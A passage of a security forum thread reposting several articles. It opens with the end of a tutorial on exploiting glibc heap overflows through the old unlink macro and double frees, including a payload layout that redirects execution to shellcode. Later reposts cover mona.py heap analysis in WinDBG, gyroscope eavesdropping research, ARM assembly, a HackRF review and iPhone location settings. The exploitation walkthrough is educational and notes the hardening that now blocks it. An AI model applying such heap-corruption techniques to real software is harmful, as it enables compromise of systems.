sizeof(char)); strcpy(first_buf, argv[1]); free(first_buf); free(second_buf); return 0; } [/INDENT] The heap situation will look like: first_buf size has been aligned to 8-bit (so, from 78 to 80 byte of buffer space) and includes the prev_size and the size fields (80+4+4=88). In addition the LSB has been set to 1, as the chunk is used: the final size for this chunk is 89 (0x59). The second_buf chunk size is already 8-bit aligned and shares the first 4 bytes with the previous chunk: this means that the final size of the chunk itself is 25 (0x19), as the LSB is set as well. It is clear that, if we overflow first_buf, it is possible to overwrite the data of second_buf (metadata included). So here’s the strategy: The second_buf chunk must be “transformed” into a freed chunk The address of memory where the 4 bytes are going to be written (minus 12) must be stored in the fd field of the chunk storing second_buf The 4 bytes to be written must be stored in the bk field of the chunk storing second_buf The whole thing must be triggered when free(first_buf) is executed The strategy is pretty simple: the only tricky point is the first one, but its solution is simple and awesome. Glibc’s implementation of malloc checks if a chunk is free or not with the following macro: #define inuse_bit_at_offset(p, s) (((mchunkptr) (((char *) (p)) + (s)))->size & PREV_INUSE) where p is the address of the chunk and s is its size (it actually checks the PREV_INUSE bit of the size field of the following chunk). This would mean modify a third chunk? Well, no… What if the size of the second chunk is set to 0? The size of the second chunk itself is read! As the size is set to 0, the PREV_INUSE bit is clear: according to glibc the second_buf is a free chunk. That’s everything we need, actually. The payload to be written in first_buf will be: 78 bytes of useless data 4 bytes of useless data overwriting the prev_size field of second_buf‘s chunk 4 bytes set to 0 overwriting the size field of second_buf‘s chunk 4 bytes set to the address of the last for bytes of dtors (the one having 0x00000000) overwriting the bk field of second_buf‘s chunk 4 bytes set to the address of the shellcode to be executed overwriting the fd field of second_buf‘s chunk This is really everything’s needed to execute an heap overflow exploiting the unlink macro bug. An alternative way of exploitation exists: the double-free scenario. What happens if the same chunk is freed twice? Some glibc’s versions ago, it would have been inserted twice in the free chunks list. Let’s say that one of these two chunks is then reallocated and that we modify the locations where the fd and bk fields are. Then let’s say that we get managed to allocate the “second” chunk still in the free list: as the unlink macro is called at allocation time as well, the whole mechanism is triggered again in a similar way. This trick known as the double-free exploitation, and even if it’s not THAT documented, there are known exploits aiming at this kind of vulnerability. Sadly, all this won’t work nowadays for four reasons: The RELRO technique (enabled by default on recent Linux distributions) marks the relocation sections used to dynamically dynamically loaded functions read-only (.ctors, .dtors, .jcr, .dynamic and .got): this means that the program crashes if it tries to modifies one of these sections. The __do_global_dtors_aux function (which is the one executing the destructors) has been hardened in 2007 in such a way that only the destructors actually defined in the code are going to be executed. As said at the beginning, the unlink macro has been hardened in order to check the pointers before unlinking: #define unlink(P, BK, FD) { \ FD = P->fd; \ BK = P->bk; \ if (__builtin_expect (FD->bk != P || BK->fd != P, 0)) \ malloc_printerr (check_action, "corrupted double-linked list", P); \ else { \ FD->bk = BK; \ BK->fd = FD; \ } \ } In a normal situation P->fd->bk points to P (the same is true for P->bk->fd): if this isn’t the case, then it means that the pointers have been modified and that the double-linked list is corrupted. Checks for double free have been added more or less everywhere The next step in this field is the publication of another article on Phrack #61 by jp on August 2003 (still, some time before the unlink macro was patched on glibc) that aims at build a higher layer on what MaXX discovered two years before. jp’s main point is: what should I do if I know that I can write four bytes of its memory with almost any arbitrary data with the unlink technique? At the beginning of the paper he defined the new acronym aa4bmo meaning “Almost Arbitrary 4 Bytes Mirrored Overwrite” and for respect’s sake I will keep using this acronym from now on. When MaXX wrote his article, there was no NON_MAIN_ARENA bit, so what jp did is an update of the techniques exposed by MaXX in order to have them working on the 2003 version of glibc and the implementation of the aa4bmoPrimitive function that allows to write more or less complex programs exploiting the aforementioned vulnerability. Based on the aa4bmo primitive, Phantasmal Phantasmagoria wrote another interesting article called “Exploiting the Wilderness“: in fact he proved that, in case an overflowable buffer is located next to the wilderness, then it is possible to have the aa4bmo. Of course, this jp’s whole work (and everything else based on that) stopped working when the unlink macro was hardened. MaXX, jp and Phantasmal Phantasmagoria’s work were an important step in heap overflow exploitation’s history, as they opened minds to new roads and it didn’t take too much to realize that there were/are other ways to exploit heap overflows. In fact, in 2005 Phantasmal Phantasmagoria came out with a theoretical article Malloc Maleficarum and started a new rush to the heap overflow exploits. All these next steps will be explained in the next article. Sursa: x86 Exploitation 101: heap overflows… unlink me, would you please? | gb_master's /dev/null
  12. [h=2]"Reverse Engineering for Beginners" free book[/h] Written by Dennis Yurichev (yurichev.com). [h=3]Praise for the book[/h] Its very well done .. and for free .. amazing.' (Daniel Bilar, Siege Technologies, LLC.) ...excellent and free (Pete Finnigan, Oracle RDBMS security guru.). ... book is interesting, great job! (Michael Sikorski, author of Practical Malware Analysis: The Hands-On Guide to Dissecting Malicious Software.) ... my compliments for the very nice tutorial! (Herbert Bos, full professor at the Vrije Universiteit Amsterdam.) ... It is amazing and unbelievable. (Luis Rocha, CISSP / ISSAP, Technical Manager, Network & Information Security at Verizon Business.) Thanks for the great work and your book. (Joris van de Vis, SAP Netweaver & Security specialist.) ... reasonable intro to some of the techniques. (Mike Stay, teacher at the Federal Law Enforcement Training Center, Georgia, US.) [h=3]As seen on...[/h] ... hacker news: #1, #2, reddit: #1, #2, #3, #4, #5, #6, habrahabr. [h=3]Contents[/h] Topics discussed: x86, ARM. Topics touched: Oracle RDBMS, Itanium, copy-protection dongles, LD_PRELOAD, stack overflow, ELF, win32 PE file format, x86-64, critical sections, syscalls, TLS, position-independent code (PIC), profile-guided optimization, C++ STL, OpenMP, win32 SEH. [h=3]Download PDF files[/h] [TABLE] [TR] [TD=class: dl1]Download English version[/TD] [TD=class: dl2]A4 (for browsing or printing) [/TD] [TD=class: dl2]A5 (for ebook readers)[/TD] [/TR] [TR] [TD=class: dl1] ??????? ??????? ?????? [/TD] [TD=class: dl2] A4 (??? ????????? ??? ??????) [/TD] [TD=class: dl2] A5 (??? ??????????? ???????) [/TD] [/TR] [/TABLE] [h=3]Supplementary materials[/h]Exercises, exercise solutions[h=3]Be social![/h]Feel free to send me corrections, or, it's even possible to submit patches on book's source code (LaTeX) on GitHub or gitorious or Google Code or BitBucket, or SourceForge! There is also supporting forum! You may ask any questions there! Or write me an email: dennis(a)yurichev.com [h=3]News[/h]See ChangeLog [h=3]Stay tuned![/h]My current plans for this book: MIPS, Objective-C, Visual Basic, anti-debugging tricks, Windows NT kernel debugger, Java, .NET, Oracle RDBMS. Subscribe to my twitter. Here is also my blog. Web 2.0 hater? Subscribe to my mailing list for receiving updates of this book to email. [h=3]Please donate![/h][TABLE] [/TABLE] [TABLE] [TR] [TD=class: dl2]Ways to donate[/TD] [/TR] [/TABLE] This book is free, freely available, also in source code form (LaTeX), and it will be so forever, I have no plans for publishing. So if you want me to continue, you may consider donating. Several ways to are available on this page: donate. Every donor name will be included in the book! Donor also have a right to rearrange items in my writing plan. Sursa: "Reverse Engineering for Beginners" free book
  13. Analyzing heap objects with mona.py Published August 16, 2014 | By Corelan Team (corelanc0d3r) Introduction Hi all, While preparing for my Advanced exploit dev course at Derbycon, I’ve been playing with heap allocation primitives in IE. One of the things that causes some frustration (or, at least, tends to slow me down during the research) is the ability to quickly identify objects that may be useful. After all, I’m trying to find objects that contain arbitrary data, or pointers to arbitrary data, and it’s not always easy to do so because of the noise. I decided to add a few new features to mona.py, that should allow you to find interesting objects in a faster way. The new features are only available under WinDBG. To get the latest version of mona, simply run !py mona up. Since I also upgraded to the latest version of pykd, you may have to update pykd.pyd as well before you can run the latest version of mona. (You should see update instructions in the WinDBG log window when you try to run mona with an outdated version of pykd) dumpobj (do) The first new feature is "dumpobj". This mona.py command will dump the contents of an object and provide (hopefully) useful information about the contents. The command takes the following arguments: Usage of command 'dumpobj' : ----------------------------- Dump the contents of an object. Arguments: -a <address> : Address of object -s <number> : Size of object (default value: 0x28 [COLOR=#5576D1]or[/COLOR] size of chunk) Optional arguments: -l <number> : Recursively dump objects -m <number> : Size [COLOR=#5576D1]for[/COLOR] recursive objects (default value: 0x28) As you can see in the output of !py mona help dumpobj above, we need to provide at least 2 arguments: -a <address> : the start location (address of the object, but you can specifiy any location you want) -s <number> : the size of the object. If you don’t specify the -s argument, mona will attempt to determine the size of the object. If that is not possible, mona will dump 0×28 bytes of the object. Additionally, you can tell mona to dump linked objects as well. Argument -l takes a number, which refers to the number of levels for the recursive dump. In order to somewhat limit the size of the output (and for performance reasons), only the first 0×28 bytes of the linked objects will be printed (unless you use argument -m to overrule this behavior). Of course, it is quite trivial to dump the contents of an object in WinDBG. The dds or dc commands will print out objects and show some information about its contents. In some cases, the output of dds/dc is not sufficient and it would require some additional work to further analyze the object and optional objects that are linked inside this object. Let’s look at an example. Let’s say we have a 0×78 byte object at 0x023a1bc0. Of course, we can dump the contents of the object using native WinDBG commands: 0:001> dds 0x023a1bc0 L 0x78/4 023a1bc0 023a1d30 023a1bc4 023a1818 023a1bc8 00000000 023a1bcc 023a1d3c 023a1bd0 023a1824 023a1bd4 baadf00d 023a1bd8 00020000 023a1bdc 00000001 023a1be0 00160014 023a1be4 023a1a38 023a1be8 013a0138 023a1bec 023a1a68 023a1bf0 00000000 023a1bf4 00000001 023a1bf8 023a18a8 023a1bfc 00000000 023a1c00 00000000 023a1c04 00000007 023a1c08 00000007 023a1c0c 023a18d0 023a1c10 00000000 023a1c14 00000000 023a1c18 00000000 023a1c1c 00000000 023a1c20 00000000 023a1c24 00000000 023a1c28 00000000 023a1c2c 00000000 023a1c30 00000000 023a1c34 00000000 0:001> dc 0x023a1bc0 L 0x78/4 023a1bc0 023a1d30 023a1818 00000000 023a1d3c 0.:...:.....<.:. 023a1bd0 023a1824 baadf00d 00020000 00000001 $.:............. 023a1be0 00160014 023a1a38 013a0138 023a1a68 ....8.:.8.:.h.:. 023a1bf0 00000000 00000001 023a18a8 00000000 ..........:..... 023a1c00 00000000 00000007 00000007 023a18d0 ..............:. 023a1c10 00000000 00000000 00000000 00000000 ................ 023a1c20 00000000 00000000 00000000 00000000 ................ 023a1c30 00000000 00000000 ........ Nice. We can see all kinds of things – values that appear to be pointers, nulls, and some other "garbage". Hard to tell what it is without looking at each value individually. With mona, we can dump the same object, and mona will attempt to gather more information about each dword in the object: 0:001> !py mona [COLOR=#5576D1]do[/COLOR] -a 0x023a1bc0 Hold on... [+] No size specified, checking [COLOR=#5576D1]if[/COLOR] address is part of known heap chunk Address found [COLOR=#5576D1]in[/COLOR] chunk 0x023a1bb8, heap 0x00240000, (user)size 0x78 ---------------------------------------------------- [+] Dumping object at 0x023a1bc0, 0x78 bytes [+] Preparing output file 'dumpobj.txt' - (Re)setting logfile c:\logs\HeapAlloc2\dumpobj.txt [+] Generating [COLOR=#5576D1]module[/COLOR] info table, hang on... - Processing modules - Done. Let's rock 'n roll. >> [URL="http://www.ruby-doc.org/docs/rdoc/1.9/classes/Object.html"]Object[/URL] at 0x023a1bc0 (0x78 bytes): Offset Address Contents Info ------ ------- -------- ----- +00 0x023a1bc0 | 0x023a1d30 (Heap) ptr to ASCII '0::' +04 0x023a1bc4 | 0x023a1818 (Heap) ptr to ASCII ':' +08 0x023a1bc8 | 0x00000000 +0c 0x023a1bcc | 0x023a1d3c (Heap) ptr to 0x77e46464 : ADVAPI32!g_CodeLevelObjTable+0x4 +10 0x023a1bd0 | 0x023a1824 (Heap) ptr to ASCII ':' +14 0x023a1bd4 | 0xbaadf00d +18 0x023a1bd8 | 0x00020000 = UNICODE ' ' +1c 0x023a1bdc | 0x00000001 +20 0x023a1be0 | 0x00160014 = UNICODE '' +24 0x023a1be4 | 0x023a1a38 (Heap) ptr to UNICODE 'Basic User' +28 0x023a1be8 | 0x013a0138 (Heap) ptr to ASCII 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...' +2c 0x023a1bec | 0x023a1a68 (Heap) ptr to UNICODE 'Allows programs to execute as a user that does [COLOR=#5576D1]not[/COLOR] have Administrator [COLOR=#5576D1]or[/COLOR] Power User access rights, but can still access resouces accessible by normal users.' +30 0x023a1bf0 | 0x00000000 +34 0x023a1bf4 | 0x00000001 +38 0x023a1bf8 | 0x023a18a8 +3c 0x023a1bfc | 0x00000000 +40 0x023a1c00 | 0x00000000 +44 0x023a1c04 | 0x00000007 +48 0x023a1c08 | 0x00000007 +4c 0x023a1c0c | 0x023a18d0 (Heap) ptr to ASCII ' :H:[COLOR=#00008b]p[/COLOR]:' +50 0x023a1c10 | 0x00000000 +54 0x023a1c14 | 0x00000000 +58 0x023a1c18 | 0x00000000 +5c 0x023a1c1c | 0x00000000 +60 0x023a1c20 | 0x00000000 +64 0x023a1c24 | 0x00000000 +68 0x023a1c28 | 0x00000000 +6c 0x023a1c2c | 0x00000000 +70 0x023a1c30 | 0x00000000 +74 0x023a1c34 | 0x00000000 [+] This mona.py action took 0:00:00.579000 Apparently some of the values in the object point at strings (ASCII and Unicode), another point appears to link to another object (ADVAPI32!g_CodeLevelObjTable+0×4). This is a lot more useful than dds or dc. But we can make it even better. We can tell mona to automatically print out linked objects as well, up to any level deep. Let’s repeat the mona command, this time asking for linked objects up to one level deep: 0:001> !py mona [COLOR=#5576D1]do[/COLOR] -a 0x023a1bc0 -l 1 Hold on... [+] No size specified, checking [COLOR=#5576D1]if[/COLOR] address is part of known heap chunk Address found [COLOR=#5576D1]in[/COLOR] chunk 0x023a1bb8, heap 0x00240000, (user)size 0x78 ---------------------------------------------------- [+] Dumping object at 0x023a1bc0, 0x78 bytes [+] Also dumping up to 1 levels deep, max size of nested objects: 0x28 bytes [+] Preparing output file 'dumpobj.txt' - (Re)setting logfile c:\logs\HeapAlloc2\dumpobj.txt [+] Generating [COLOR=#5576D1]module[/COLOR] info table, hang on... - Processing modules - Done. Let's rock 'n roll. >> [URL="http://www.ruby-doc.org/docs/rdoc/1.9/classes/Object.html"]Object[/URL] at 0x023a1bc0 (0x78 bytes): Offset Address Contents Info ------ ------- -------- ----- +00 0x023a1bc0 | 0x023a1d30 (Heap) ptr to ASCII '0::' +04 0x023a1bc4 | 0x023a1818 (Heap) ptr to ASCII ':' +08 0x023a1bc8 | 0x00000000 +0c 0x023a1bcc | 0x023a1d3c (Heap) ptr to 0x77e46464 : ADVAPI32!g_CodeLevelObjTable+0x4 +10 0x023a1bd0 | 0x023a1824 (Heap) ptr to ASCII ':' +14 0x023a1bd4 | 0xbaadf00d +18 0x023a1bd8 | 0x00020000 = UNICODE ' ' +1c 0x023a1bdc | 0x00000001 +20 0x023a1be0 | 0x00160014 = UNICODE '' +24 0x023a1be4 | 0x023a1a38 (Heap) ptr to UNICODE 'Basic User' +28 0x023a1be8 | 0x013a0138 (Heap) ptr to ASCII 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...' +2c 0x023a1bec | 0x023a1a68 (Heap) ptr to UNICODE 'Allows programs to execute as a user that does [COLOR=#5576D1]not[/COLOR] have Administrator [COLOR=#5576D1]or[/COLOR] Power User access rights, but can still access resouces accessible by normal users.' +30 0x023a1bf0 | 0x00000000 +34 0x023a1bf4 | 0x00000001 +38 0x023a1bf8 | 0x023a18a8 (Heap) ptr to 0x00000101 : +3c 0x023a1bfc | 0x00000000 +40 0x023a1c00 | 0x00000000 +44 0x023a1c04 | 0x00000007 +48 0x023a1c08 | 0x00000007 +4c 0x023a1c0c | 0x023a18d0 (Heap) ptr to ASCII ' :H:[COLOR=#00008b]p[/COLOR]:' +50 0x023a1c10 | 0x00000000 +54 0x023a1c14 | 0x00000000 +58 0x023a1c18 | 0x00000000 +5c 0x023a1c1c | 0x00000000 +60 0x023a1c20 | 0x00000000 +64 0x023a1c24 | 0x00000000 +68 0x023a1c28 | 0x00000000 +6c 0x023a1c2c | 0x00000000 +70 0x023a1c30 | 0x00000000 +74 0x023a1c34 | 0x00000000 >> [URL="http://www.ruby-doc.org/docs/rdoc/1.9/classes/Object.html"]Object[/URL] at 0x023a1d3c (0x28 bytes): Offset Address Contents Info ------ ------- -------- ----- +00 0x023a1d3c | 0x77e46464 ADVAPI32!g_CodeLevelObjTable+0x4 +04 0x023a1d40 | 0x023a1bcc (Heap) ptr to ASCII '<:$:' +08 0x023a1d44 | 0xbaadf00d +0c 0x023a1d48 | 0x00040000 = UNICODE ' ' +10 0x023a1d4c | 0x00000101 +14 0x023a1d50 | 0x001a0018 = UNICODE '' +18 0x023a1d54 | 0x023a1c50 (Heap) ptr to UNICODE 'Unrestricted' +1c 0x023a1d58 | 0x0090008e (Heap) ptr to ASCII 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...' +20 0x023a1d5c | 0x023a1c88 (Heap) ptr to UNICODE 'Software access rights are determined by the access rights of the user.' +24 0x023a1d60 | 0x00000000 >> [URL="http://www.ruby-doc.org/docs/rdoc/1.9/classes/Object.html"]Object[/URL] at 0x023a18a8 (0x28 bytes): Offset Address Contents Info ------ ------- -------- ----- +00 0x023a18a8 | 0x00000101 +04 0x023a18ac | 0x05000000 +08 0x023a18b0 | 0x0000000a +0c 0x023a18b4 | 0xabababab +10 0x023a18b8 | 0xabababab +14 0x023a18bc | 0xfeeefeee +18 0x023a18c0 | 0x00000000 +1c 0x023a18c4 | 0x00000000 +20 0x023a18c8 | 0x0005000a = UNICODE '' +24 0x023a18cc | 0x051807c2 [+] This mona.py action took 0:00:00.640000 As you can see in the output above, mona determined that the source object contained references to 2 linked objects, and decided to dump those linked object as well. It’s important to know that mona won’t consider strings (ASCII or Unicode) as objects, because mona already shows the strings, even if they are referenced inside the object. The output of the dumpobj command is written to a text file called "dumpobj.txt". For your info, the output of !mona info -a <address> includes the output of mona dumpobj (without printing recursive objects). If you want to understand what exactly a given address is, you’ll get something like this: 0:001> !py mona info -a 0x023a1bc0 Hold on... [+] Generating [COLOR=#5576D1]module[/COLOR] info table, hang on... - Processing modules - Done. Let's rock 'n roll. [+] NtGlobalFlag: 0x00000070 0x00000040 : +hpc - Enable Heap Parameter Checking 0x00000020 : +hfc - Enable Heap Free Checking 0x00000010 : +htc - Enable Heap Tail Checking [+] Information about address 0x023a1bc0 {PAGE_READWRITE} Address is part of page 0x013c0000 - 0x023a2000 This address resides [COLOR=#5576D1]in[/COLOR] the heap Address 0x023a1bc0 found [COLOR=#5576D1]in[/COLOR] _HEAP @ 00240000, Segment @ 013c0040 ( bytes ) (bytes) HEAP_ENTRY Size PrevSize Unused Flags UserPtr UserSize Remaining - state 023a1bb8 00000090 00000158 00000018 [07] 023a1bc0 00000078 00000010 Fill pattern,Extra present,Busy ([COLOR=#00008b]hex[/COLOR]) 00000144 00000344 00000024 00000120 00000016 Fill pattern,Extra present,Busy (dec) Chunk header size: 0x8 (8) Size initial allocation request: 0x78 (120) Total space [COLOR=#5576D1]for[/COLOR] data: 0x88 (136) Delta between initial size [COLOR=#5576D1]and[/COLOR] total space [COLOR=#5576D1]for[/COLOR] data: 0x10 (16) [URL="http://www.ruby-doc.org/docs/rdoc/1.9/classes/Data.html"]Data[/URL] : 30 1d 3a 02 18 18 3a 02 00 00 00 00 3c 1d 3a 02 24 18 3a 02 0d f0 ad ba 00 00 02 00 01 00 00 00 ... ---------------------------------------------------- [+] Dumping object at 0x023a1bc0, 0x90 bytes [+] Preparing output file 'dumpobj.txt' - (Re)setting logfile c:\logs\HeapAlloc2\dumpobj.txt >> [URL="http://www.ruby-doc.org/docs/rdoc/1.9/classes/Object.html"]Object[/URL] at 0x023a1bc0 (0x90 bytes): Offset Address Contents Info ------ ------- -------- ----- +00 0x023a1bc0 | 0x023a1d30 (Heap) ptr to ASCII '0::' +04 0x023a1bc4 | 0x023a1818 (Heap) ptr to ASCII ':' +08 0x023a1bc8 | 0x00000000 +0c 0x023a1bcc | 0x023a1d3c (Heap) ptr to 0x77e46464 : ADVAPI32!g_CodeLevelObjTable+0x4 +10 0x023a1bd0 | 0x023a1824 (Heap) ptr to ASCII ':' +14 0x023a1bd4 | 0xbaadf00d +18 0x023a1bd8 | 0x00020000 = UNICODE ' ' +1c 0x023a1bdc | 0x00000001 +20 0x023a1be0 | 0x00160014 = UNICODE '' +24 0x023a1be4 | 0x023a1a38 (Heap) ptr to UNICODE 'Basic User' +28 0x023a1be8 | 0x013a0138 (Heap) ptr to ASCII 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...' +2c 0x023a1bec | 0x023a1a68 (Heap) ptr to UNICODE 'Allows programs to execute as a user that does [COLOR=#5576D1]not[/COLOR] have Administrator [COLOR=#5576D1]or[/COLOR] Power User access rights, but can still access resouces accessible by normal users.' +30 0x023a1bf0 | 0x00000000 +34 0x023a1bf4 | 0x00000001 +38 0x023a1bf8 | 0x023a18a8 (Heap) ptr to 0x00000101 : +3c 0x023a1bfc | 0x00000000 +40 0x023a1c00 | 0x00000000 +44 0x023a1c04 | 0x00000007 +48 0x023a1c08 | 0x00000007 +4c 0x023a1c0c | 0x023a18d0 (Heap) ptr to ASCII ' :H:[COLOR=#00008b]p[/COLOR]:' +50 0x023a1c10 | 0x00000000 +54 0x023a1c14 | 0x00000000 +58 0x023a1c18 | 0x00000000 +5c 0x023a1c1c | 0x00000000 +60 0x023a1c20 | 0x00000000 +64 0x023a1c24 | 0x00000000 +68 0x023a1c28 | 0x00000000 +6c 0x023a1c2c | 0x00000000 +70 0x023a1c30 | 0x00000000 +74 0x023a1c34 | 0x00000000 +78 0x023a1c38 | 0xabababab +7c 0x023a1c3c | 0xabababab +80 0x023a1c40 | 0x00000000 +84 0x023a1c44 | 0x00000000 +88 0x023a1c48 | 0x00120007 = UNICODE '' +8c 0x023a1c4c | 0x051e0752 [+] Disassembly: Instruction at 023a1bc0 : XOR BYTE PTR [B]dumplog (dl)[/B] It is clear that the dumpobj command will make it easier to visualize important information inside an object. This is certainly helpful if you already know the starting object. What if you have been logging all Heap allocations and free operations in the application and storing the output in a log file? Even a few lines of javascript code can be quite noisy from a Heap perspective, making it less trivial to identify interesting objects. To make our lives easier, I decided to implement "dumplog", which will parse a log file (based on a certain syntax) and perform a "dumpobj" on each object that has been allocated, but not freed. In the current version, dumplog will not dump linked objects, but I plan on adding this feature soon. (probably tomorrow) Dumplog requires a proper setup. We need to tell WinDBG to create a log file that follows a specific convention, and we obviously must run mona dumplog in the same debug session (to make sure the logged allocations and free operations are still relevant). The output of "!py mona help dumplog" shows this: Usage of command 'dl' : ------------------------ Dump all objects recorded in an alloc/free log Note: dumplog will only dump objects that have not been freed in the same logfile. Expected syntax for log entries: Alloc : 'alloc(size in hex) = address' Free : 'free(address)' Additional text after the alloc & free info is fine. Just make sure the syntax matches exactly with the examples above. Arguments: -f [COLOR=#5576D1]<[/COLOR][COLOR=#800000]path[/COLOR]/[COLOR=#ff0000]to[/COLOR]/[COLOR=#ff0000]logfile[/COLOR][COLOR=#5576D1]>[/COLOR] : Full path to the logfile The idea is to log all Heap allocations and free operations to a log file. In WinDBG this can be achieved using the following steps: Before running the process and triggering the alloc/free operations that you want to capture and analyze, tell WinDBG to write the output of the log window to a text file: .logclose .logopen c:\\allocs.txt Next, set up 2 logging breakpoints: bp !ntdll + 0002e12c ".printf \"alloc(0x%x) = 0x%p\", poi(esp+c), eax; .echo; g" bp ntdll!RtlFreeHeap "j (poi(esp+c)!=0) '.printf \"free(0x%p)\", poi(esp+c); .echo; g'; 'g';" (based on a recent version of kernel32.dll, Windows 7 SP1). These 2 breakpoints will print a message to the WinDBG log window each time RtlAllocateHeap and RtlFreeHeap are called, printing out valuable information about the API call. It’s important to stick to this format, but you are free to add more text to the end of the message string. With these 2 breakpoints active, and WinDBG configured to start writing the output of the log window to a text file, we can run the application. When you’re ready to do analysis, break WinDBG. Don’t close it at this point, but close the log file using the .logclose command. We can now use mona to parse the log file, find the objects that have been allocated and not freed, and perform a mona dumpobj on each of those objects. !py mona dl -f c:\allocs.txt The output will be written to dump_alloc_free.txt I hope you’ll enjoy these 2 new features. Stay safe & take care cheers -corelanc0d3r Sursa: https://www.corelan.be/index.php/2014/08/16/analyzing-heap-objects-with-mona-py/
  14. [h=1]Hackers transform a smartphone gyroscope into an always-on microphone[/h]by Steve Dent | @Stevetdent | 2 days ago Apps that use your smartphone's microphone need to ask permission, but the motion sensors? No say-so needed. That might not sound like a big deal, but security researchers from Stanford University and defense firm Rafael have discovered a way to turn Android phone gyroscopes into crude microphones. They call their app " " and here's how it works: the tiny gyros in your phone that measure orientation do so using vibrating pressure plates. As it turns out, they can also pick up air vibrations from sounds, and many Android devices can do it in the 80 to 250 hertz range -- exactly the frequency of a human voice. By contrast, the iPhone's sensor only uses frequencies below 100Hz, and is therefore useless for tapping conversations. Though the researchers' system can only pick up the odd word or the speaker's gender, they said that voice recognition experts could no doubt make it work better. They'll be delivering a paper next week at the Usenix Security conference, but luckily, Google is already up on the research. "This early, academic work should allow us to provide defenses before there is any likelihood of real exploitation." Via: Wired.com Source: Stanford University
  15. ARM: Introduction to ARM by David Thomas on 03 March 2012 Introduction The Introduction to ARM course aims to bring the reader up-to-speed on programming in ARM assembly language. Its goal is not to get you to write entire programs in ARM assembly language, but instead to give you enough knowledge to make judicious use of it. While you might never routinely come into contact with assembly language there are a number of reasons for delving down to the assembly level: You might want to improve the performance of speed-critical portions of your code, You might be debugging, trying to solve a problem which is not obvious from the source code alone, Or, you might just be curious. Limitations The course was written with application programmers in mind, rather than systems programmers. As such the content is geared towards the ‘user mode’ world. Vectors, exceptions, interrupt and processor modes are not presently discussed. Navigation Move between pages using the arrows at the bottom of the page. Begin reading here. Further Reading This is the first part of a two-part ARM training course, the second is called Efficient C for ARM and is available here. Link: ARM: Introduction to ARM: Start | DaveSpace
  16. HackRF Initial Review The HackRF One is a new software defined radio that has recently been shipped out to Kickstarter funders. It is a transmit and receive capable SDR with 8-Bit ADC, 10 MHz to 6 GHz operating range and up to 20 MHz of bandwidth. It can now be preordered for $299 USD. We just received ours from backing the Kickstarter and here’s a brief review of the product. We didn’t do any quantitative testing and this is just a first impressions review. So far we’ve only tested receive on Windows SDR#. Unboxing Inside the box is the HackRF unit in a quality protective plastic casing, a telescopic antenna and a USB cable. We show an RTL-SDR next to the HackRF for size comparison. HackRF + Telescopic Antenna + USB Cable + Box (RTL-SDR Dongle Shown for Size Comparison) Back of the box HackRF Windows SDR# Installation Process Installation of the HackRF on Windows is very simple and is the same process as installing an RTL-SDR dongle. Assuming you have SDR# downloaded, simply plug in your HackRF into a USB port, open zadig in the SDR# folder, select the HackRF and click install driver. The HackRF is now ready to use with SDR#. Initial Receive Review We first tested the HackRF at its maximum bandwidth of 20 MHz in SDR#. Unfortunately at this sample rate the PC we used (Intel i5 750) could not keep up. The waterfall and audio were very choppy, even when the waterfall and spectrum analyser were turned off. After switching to the next lowest bandwidth of 16 MHz everything was fine. With the waterfall resolution set to 65536 the CPU usage was at around 45-50%. It is very nice to have such a wide bandwidth at your disposal. However, the drawback is that with such a wide bandwidth it is very difficult to find a narrowband signal on the waterfall if the frequency is unknown. This might make things difficult for people new to signal browsing. Also, since the bandwidth is so wide the waterfall resolution when zoomed in is very poor making it very difficult to see a clear signal structure, but this is more a problem with SDR# rather than the HackRF. The included antenna is good and made of a high quality build. There is a spring in the base of the antenna which may be an inductor, or may just be there for mechanical reasons. As the antenna screws directly into the HackRF body there is no place for a ground plane. The HackRF has no front end filtering (preselectors) so there are many images of strong signals that show up at multiples of the selected sample rate. Most wideband SDRs are like this but these images are also not helped by the low 8 bit ADC resolution. Image rejection and sensitivity could be improved by using your own preselector front end like many people have done with the RTL-SDR. Overall reception sensitivity seems to be very similar to the RTL-SDR. There are three gain settings available for the HackRF in SDR#. One is for the LNA Gain, one for VGA gain and the third is a check box for ‘Amp’. The LNA gain is the main gain that should be used and usually only a small amount of VGA gain is needed as VGA gain seems to just increase the noise the same amount as the signal. We’re not sure what ‘Amp’ is, but it seems to do something similar to ‘RTL AGC’ on the RTL-SDR. We checked the PPM offset against a known signal and found that the offset was -12 ppm, which was pretty good. Only about 1 ppm of thermal drift was seen throughout the operation of the HackRF. Overall the HackRF is a good product and is great for those who want the massive frequency range, wide bandwidth and transmit capability. But if you are interested in reception only and are looking for a wide bandwidth SDR upgrade to the RTL-SDR I would suggest waiting for the Airspy to be released. The advantage to the Airspy will be its 12-bit ADC and cheaper price. Airspy has entered production now and the first batch of 500 units should soon be available. Here are some example wide band signals received with the HackRF. HackRF Receiving the entire WFM band HackRF Receiving a DVB-T Signal HackRF Receiving in the GSM Band HackRF Possibly Receiving LTE? HackRF at 2.4 GHz – Must be WiFi? HackRF Receiving the entire AM Radio Band Here is another review by a YouTube user who focuses on HF reception HackRF One on Windows with SDR # Here is an older review comparing the specs of the HackRF against the BladeRF and USRP B200. Sursa: HackRF Initial Review - rtl-sdr.com
  17. [h=1]Change This iPhone Setting To Stop Closed Apps From Tracking Your Location[/h] Foursquare users who play hooky from work to go see a movie may not “check in” for fear of colleagues seeing their whereabouts, but the app still knows they’re there. Last week, the Wall Street Journal confirmed an earlier report that Foursquare “tracks your every movement, even when the app is closed.” Foursquare is far from the only app doing this. On my phone there were 14 other apps passively tracking my location, including a theft recovery app that needs to know where the phone is in case it’s stolen from me. Other apps track users’ locations even when the app is not actively running to gather intelligence for better advertising and personalization. Android users have to force quit the application running in the background to avoid it. For iPhone users, the passive tracking relies on a feature called “Background App Refresh.” If you’re a Machead who doesn’t like the idea of closed apps being able to track you, you should make a change to your settings as this is on by default. Go to your 